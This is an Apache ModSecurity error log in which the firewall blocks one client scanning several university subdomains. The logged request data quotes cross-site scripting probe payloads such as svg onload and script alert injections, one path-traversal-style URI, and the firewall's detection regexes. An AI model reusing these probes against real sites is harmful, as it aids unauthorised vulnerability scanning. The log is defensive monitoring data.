[Tue Aug 29 11:52:28.555415 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAoN9coAAAAJ"]
[Tue Aug 29 11:52:28.557259 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnjjOwAAAAX"]
[Tue Aug 29 11:52:28.561007 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnd3GoAAAAI"]
[Tue Aug 29 11:52:28.562468 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15jMCo-f0AAAfWON4AAAAL"]
[Tue Aug 29 11:52:28.682668 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoEZO8AAAAB"]
[Tue Aug 29 11:52:28.683341 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoN9csAAAAJ"]
[Tue Aug 29 11:52:28.684394 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoO5zUAAAAK"]
[Tue Aug 29 11:52:28.687862 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15jMCo-f0AAAoGFXkAAAAE"]
[Tue Aug 29 11:52:28.689751 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAnn2DcAAAAe"]
[Tue Aug 29 11:52:28.701623 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAnd3GsAAAAI"]
[Tue Aug 29 11:52:28.722788 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAoEZPAAAAAB"]
[Tue Aug 29 11:52:29.557698 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnn2DkAAAAe"]
[Tue Aug 29 11:52:29.561419 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAmNp7YAAAAQ"]
[Tue Aug 29 11:52:29.577272 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15jcCo-f0AAAoEZPIAAAAB"]
[Tue Aug 29 11:52:29.659720 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15jcCo-f0AAAlUlsAAAAA0"]
[Tue Aug 29 11:52:29.664224 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15jcCo-f0AAAn401cAAAAW"]
[Tue Aug 29 11:52:29.668602 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnTlP0AAAAA"]
[Tue Aug 29 11:52:29.684150 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoN9c4AAAAJ"]
[Tue Aug 29 11:52:29.880535 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnn2DoAAAAe"]
[Tue Aug 29 11:52:29.890869 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoLfFwAAAAG"]
[Tue Aug 29 11:52:30.549200 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAnTlQAAAAAA"]
[Tue Aug 29 11:52:30.567129 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAn401oAAAAW"]
